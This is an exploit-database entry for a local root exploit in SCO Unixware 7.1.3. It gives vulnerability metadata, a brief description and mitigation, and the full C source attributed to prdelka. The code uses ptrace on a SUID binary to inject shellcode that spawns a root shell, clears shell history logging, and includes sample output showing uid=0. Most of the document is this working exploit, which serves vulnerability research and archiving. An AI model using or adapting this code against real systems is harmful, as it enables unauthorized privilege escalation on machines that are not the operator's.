SCO Unixware 7.1.3 ptrace local root exploit

vendor:

Unixware

by:

prdelka

7.2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Unixware

Affected Version From: 7.1.2003

Affected Version To: 7.1.2003

Patch Exists: NO

Related CWE: N/A

CPE: o:sco:unixware:7.1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: SCO UNIX_SVR5

2002

SCO Unixware 7.1.3 ptrace local root exploit

SCO Unixware 7.1.3 kernel allows unprivileged users to debug binaries. The condition can be exploited by an attacker when he has execute permissions to a file which has the suid bit set. An attacker can use a shellcode to gain root access.

Mitigation:

Ensure that all SUID binaries are properly secured and that users are not allowed to debug them.

Source

Exploit-DB raw data:

/* SCO Unixware 7.1.3 ptrace local root exploit
 * ============================================
 * SCO Unixware 7.1.3 kernel allows unprivledged users
 * to debug binaries. The condition can be exploited
 * by an attacker when he has execute permissions to 
 * a file which has the suid bit set.
 * 
 * Example.
 *
 *  $ uname -a
 *  UnixWare iron 5 7.1.3 i386 x86at SCO UNIX_SVR5
 *  $ /linux/bin/bash
 *  bash-2.05$ uname -a
 *  Linux iron.fi.st 2.4.13 #1 Thu Oct 31 02:32:23 EST 2002 i686 unknown
 *  bash-2.05$ id
 *  uid=122(matt) gid=1(other) groups=1(other)
 *  bash-2.05$ ./fu /unixware/usr/lib/sendmail
 *  [ SCO Unixware 7.1.3 ptrace local root exploit
 *  [ Using 0xbfffed78
 *  sh-2.05# id
 *  uid=0(root) gid=1(other) groups=1(other)
 *  sh-2.05# 
 * 
 *  - prdelka
 */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <syscall.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <errno.h>
#include <asm/user.h>



char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		 "\x90\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0"
		 "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50"
		 "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


int main(int argc,char* argv[])
{
	int esp, eip, i = 0;
	struct user_regs_struct regs;
	char *env[] = {"HISTFILE=/dev/null",NULL};
	pid_t pid;
	printf("[ SCO Unixware 7.1.3 local root exploit\n");
	if(argc < 2)
	{
		printf("[ Usage: [binary]\n");
		printf("[ e.g -rwsr-sr-x root root /linux/opt/kde2/bin/kcheckpass\n");
		exit(0);
	}
	switch (pid = fork())
	{
	case -1:
		perror("fork");
		break;
	case 0:		
		ptrace(PTRACE_TRACEME, 0, 0, 0);		
		pid = getpid();
		execle(argv[1],argv[1],NULL,env);		
		break;
	default:		
		waitpid(pid, NULL, 0);	
		ptrace(PTRACE_GETREGS, pid, NULL, &regs);
		esp = eip = regs.esp - 512;
		while (i < strlen(shellcode)) 
		{
			ptrace(PTRACE_POKETEXT, pid, esp, (int) *(int *) (shellcode + i));
			i += 4;
			esp += 4;
		}
		regs.eip = (long) eip;
		printf("[ Using 0x%x\n",regs.eip);	
		ptrace(PTRACE_SETREGS, pid, NULL, &regs);
		ptrace(PTRACE_DETACH, pid, NULL,NULL);
	}
	usleep(1);
	wait(0);
	return 0;
}

// milw0rm.com [2006-02-26]